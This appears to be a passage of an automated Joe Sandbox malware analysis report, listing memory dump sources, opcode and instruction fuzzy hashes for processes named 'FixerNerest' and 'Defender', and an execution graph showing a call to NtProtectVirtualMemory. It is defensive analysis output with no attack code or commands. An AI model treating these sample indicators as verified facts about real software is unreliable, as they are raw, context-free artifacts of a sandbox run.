                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c75676086fdaaf1748a4590b3fb92c2b55fe1139f64da00d59201003ac51aed0
                                                                                                                                                                                                                                            • Instruction ID: 782fdbfb98385273815cb2400dd93425fc85ab37fe1d87f3539f021eaff408cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75676086fdaaf1748a4590b3fb92c2b55fe1139f64da00d59201003ac51aed0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54413C31E1891A9FEB94FB68E8956BCB2E2EF58351F40017AD80DD32E6DF286C418754
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3445ed4d7b8c5f68c269e227bb4802c5d16e45d720ec6762bcaabb475f86fa43
                                                                                                                                                                                                                                            • Instruction ID: 83c89292ef1e1627611813518c9bc146d1c9436170623e7abbc08a314d35f5ea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3445ed4d7b8c5f68c269e227bb4802c5d16e45d720ec6762bcaabb475f86fa43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F418631E1991E8FEBA5FB2894456FD72E2FF98381F44047AE40DD32C1DB38A8418685
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 759983fe263f38a3526dd5ae168941c9e817fcb722fb93e27eb1c5169d5a5677
                                                                                                                                                                                                                                            • Instruction ID: 238cd177395ffe28eac2dc42afaf1260c45ac3685f87502af80afb28287b61bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 759983fe263f38a3526dd5ae168941c9e817fcb722fb93e27eb1c5169d5a5677
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6631EF31E1D86A4FEB95B72894586FC76E1EFA9790F180077D40EE31D2DF2CA8818745
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 14bece4a411e9940e9d8fbe8f2d7be6a1bc0df31d997333b4936c8283c2e6dfd
                                                                                                                                                                                                                                            • Instruction ID: 66127594ee5444ba65a5086a9da4c6e2583404c50ac5e90dec28efac09c6cb4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14bece4a411e9940e9d8fbe8f2d7be6a1bc0df31d997333b4936c8283c2e6dfd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0416161E1EA8B2FE75077F810262BF5CA19F91281F914476E04DC76CBEE2CAA014369
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: eae226e4eed6b93d358c23b7754f296ffa57cea68fee2a32f9808e0feb10163e
                                                                                                                                                                                                                                            • Instruction ID: af43a102dfe3fad9742b32b948cec7ec6c67c78211fa2397ff5fda4ad0e3ba5d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae226e4eed6b93d358c23b7754f296ffa57cea68fee2a32f9808e0feb10163e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD317A31E1CA5D8FEB84EB688849AECBBE1EF58350F1400B7D40DD32D1DB2868818784
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 645becf13002a9a8dd0f5ef538405b193520ec4c23f4e1224dbeebe2a0448bf4
                                                                                                                                                                                                                                            • Instruction ID: 5f7ae20f485196bcdf89f17ece54975e2edb6bc883a628ab463f6f96654907e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 645becf13002a9a8dd0f5ef538405b193520ec4c23f4e1224dbeebe2a0448bf4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5221F621E1D86A0FF7A9733868551B815C1EFA5B90F584077D84DE31D6EF0C9CC14389
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 667a334dce32213be9c4af774a44d8c9ce89c13f49dbbfe3e00a0a8aebed4493
                                                                                                                                                                                                                                            • Instruction ID: ca79fd0a6fca23531618693a8489611797a9bcf07dcd605e955444255639d4e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 667a334dce32213be9c4af774a44d8c9ce89c13f49dbbfe3e00a0a8aebed4493
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6E1B23090CA8E8FEBA8EF28D8557E937D1EF54350F14426AE84DC72D1DF79A8448B81
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: `KH$#CN_^
                                                                                                                                                                                                                                            • API String ID: 0-1010693636
                                                                                                                                                                                                                                            • Opcode ID: d4666239e1940fd5da5acc067321e1607c562d70b788ef0abdb24a2ee60196a0
                                                                                                                                                                                                                                            • Instruction ID: 6bc0f7d28c93e04eadeab7bf95fcc558ecff2ed79eb150588d06d877b78b37f0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4666239e1940fd5da5acc067321e1607c562d70b788ef0abdb24a2ee60196a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FC17B30A1D9198FEB89F72CA455BBAB3D2FF98350F640579E00DC32D2DE2DA8418755
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ;M_^
                                                                                                                                                                                                                                            • API String ID: 0-3487335239
                                                                                                                                                                                                                                            • Opcode ID: 2f4ed7ff09e9ff55cde86ff8fa7773cf2be4cb05cbdfe7ea01a43c2e1c92dd90
                                                                                                                                                                                                                                            • Instruction ID: b54ab37b8f4d574d86a83ac789484cc0d14a7145f0cb57c6efb9e1ac2b4ca9b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f4ed7ff09e9ff55cde86ff8fa7773cf2be4cb05cbdfe7ea01a43c2e1c92dd90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3251F432E1D96A9FEB58FB2CA8450E977D1EFA4760F14027BD40DC72C7DE2898068384
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ?M_^
                                                                                                                                                                                                                                            • API String ID: 0-1086198800
                                                                                                                                                                                                                                            • Opcode ID: 7186c2ecd838db0fc796fb847205d765296e305a5c8f34bb7f80ea02f0013c15
                                                                                                                                                                                                                                            • Instruction ID: 5894356a9530dad61739faaa607cad1961d4d1caa26758ca147884ff2f50d689
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7186c2ecd838db0fc796fb847205d765296e305a5c8f34bb7f80ea02f0013c15
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F011E53191E6CA5FE752772868210E67FB0EF87268F0902F7D48CCA0D3DA0C18568366
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ^
                                                                                                                                                                                                                                            • API String ID: 0-1590793086
                                                                                                                                                                                                                                            • Opcode ID: 79e02effed17577b1df7a1a93e80f9bb22eba86c9b543a655a50ef9709293ffe
                                                                                                                                                                                                                                            • Instruction ID: aaf21455ad5a42e349483cab415bcea0c4518bcd5b5ab6565617bcde728c6bd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79e02effed17577b1df7a1a93e80f9bb22eba86c9b543a655a50ef9709293ffe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a806e663962e396075d46eb663712a3b956629d996bb05bce48123f052e0a7fa
                                                                                                                                                                                                                                            • Instruction ID: 964a205f1ca7b6a6d27d6844ec8ac4f28c3ead39d09b96c8d934936f59df4380
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a806e663962e396075d46eb663712a3b956629d996bb05bce48123f052e0a7fa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DD1A23090CA898FEB68EF28D8567F977D1FF54350F04426EE84DC7291DB75A8458B82
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a0c56e2ea04ca2dca55514c3351c3b597d4d97f230467d14ca1f1fd7c53bde38
                                                                                                                                                                                                                                            • Instruction ID: 10b054898105937d78b2c54204c30f16e713a952e0e88c6455b88164d29e1c7b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0c56e2ea04ca2dca55514c3351c3b597d4d97f230467d14ca1f1fd7c53bde38
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85B1EF30E1DA098FE794FBA8989AAB977E2FF99350F14017AD00DC32D3DE2968418755
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bc1e8424f0fcb468d50b9ecbd4941eb6a1593b217c4efbf8bce70b028b5ac7e1
                                                                                                                                                                                                                                            • Instruction ID: 377e8fe6d3099011d036ea383c317fcdb9231f60a78a0141b0ec23200b3a8e10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc1e8424f0fcb468d50b9ecbd4941eb6a1593b217c4efbf8bce70b028b5ac7e1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22B1E43050CA8D4FEBA8EF28D8557E93BE0FF55350F04426AE84DC72D2CB74A9458B86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 85f17cde8d69f962dc21d42b7529759744af583085c1e4b9cd8274c7d23ff61e
                                                                                                                                                                                                                                            • Instruction ID: f514055c1a3c220d6152cb15218c3ff8bab642b80baf938437054bd98a6077ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f17cde8d69f962dc21d42b7529759744af583085c1e4b9cd8274c7d23ff61e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E416F31F1C90D8FEB95F7689459AB836E2FF99351F59007AE04EC32D2EF2898818705
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8792e25c7915e1621d4114b1592805bebc453c1b20afc1a48aca7c44718d7e80
                                                                                                                                                                                                                                            • Instruction ID: b2d091a5fedbbc488c3401030d388c1c6a5ee71e781659cd49ebd42a17d4e57b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8792e25c7915e1621d4114b1592805bebc453c1b20afc1a48aca7c44718d7e80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C416F31E2891A9FEBA4FB68E8556BCB2E1FF48341F800179D80DD32E6DF296C418744
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0527c6f33063f1a639fc5b82607cb9e8fda4fdca94a993a75cbbc0522bab3068
                                                                                                                                                                                                                                            • Instruction ID: 456219f0381edb005c2df5568024cbaddc79b669ffb7fa1cbe1a85d6342ac920
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0527c6f33063f1a639fc5b82607cb9e8fda4fdca94a993a75cbbc0522bab3068
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89418B31E599198FEBA4FB68A4466B973E2FF98380F640475D40DD32C2DB3AA8418645
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 477f9fe84e0847481ea8ae597eef716f0835cdddff1e7600f18f4f94b1c720cd
                                                                                                                                                                                                                                            • Instruction ID: 798b86c4015e45e5b1bef5bec030c8c567c7399e1927638ece2345049a36faac
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 477f9fe84e0847481ea8ae597eef716f0835cdddff1e7600f18f4f94b1c720cd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6031EF31E1D8594FEB95B76894586BC7AE1EF99390F180077E00EC31D2DF2C68828745
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: aff400d3bdb67d704e70b8d93ec1417cb7760c9cccf47b090339a11ad959b396
                                                                                                                                                                                                                                            • Instruction ID: 13201bb70f93a958855fb2463388bd009c272c6a89030a64a4a63aa42ac3af5a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aff400d3bdb67d704e70b8d93ec1417cb7760c9cccf47b090339a11ad959b396
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9414261E1E6471EE75573BC30266BF5DA19F81381F90447CE04DCB6CBEE6EAA014329
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 52af82d9925842bc7e8c44bd17984d7256d7c94471d28b91cc6d825682e0d5ee
                                                                                                                                                                                                                                            • Instruction ID: 462908e484fb281d9f080a816f84c4d8b652ba3c730441cdcf0a2d3053230b9c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52af82d9925842bc7e8c44bd17984d7256d7c94471d28b91cc6d825682e0d5ee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32314032E1D99A8FF795B73CA4591B8ABD1EF14780F1900B6C40CC71D3CE0A5C098346
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c66857c3076c7ff99c7b9321b7d9bf9144f0b1efa1a402316e1609173dd9c5b8
                                                                                                                                                                                                                                            • Instruction ID: d403411612f545c8952e64ba90078fad9c209017a817c7bd4f68a12c772a0129
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c66857c3076c7ff99c7b9321b7d9bf9144f0b1efa1a402316e1609173dd9c5b8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B316B31E2C95D8FEB94EB68A849AECBBE1EF58350F150076D40DD32D2DB2968808785
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 40fd2e55edb305b0c99d4e41d80a13eaa1b00698be62b3a7a6d4ec78d418b91a
                                                                                                                                                                                                                                            • Instruction ID: de7741d1d800b4d474d00ccacc9b4ad3195797c1a38262672aa8913cd392833a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40fd2e55edb305b0c99d4e41d80a13eaa1b00698be62b3a7a6d4ec78d418b91a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221C321E1D94A4FF7A97378A8552B826C1EF85390F59407BE84EC31C2EF4C9C920399
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Execution Graph

Execution Coverage: 17.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 100%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph 6794 7ff848f317cd 6795 7ff848f317df NtProtectVirtualMemory 6794->6795 6797 7ff848f318b5 6795->6797

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000011.00000002.2763082160.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff848f25000_Defender.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0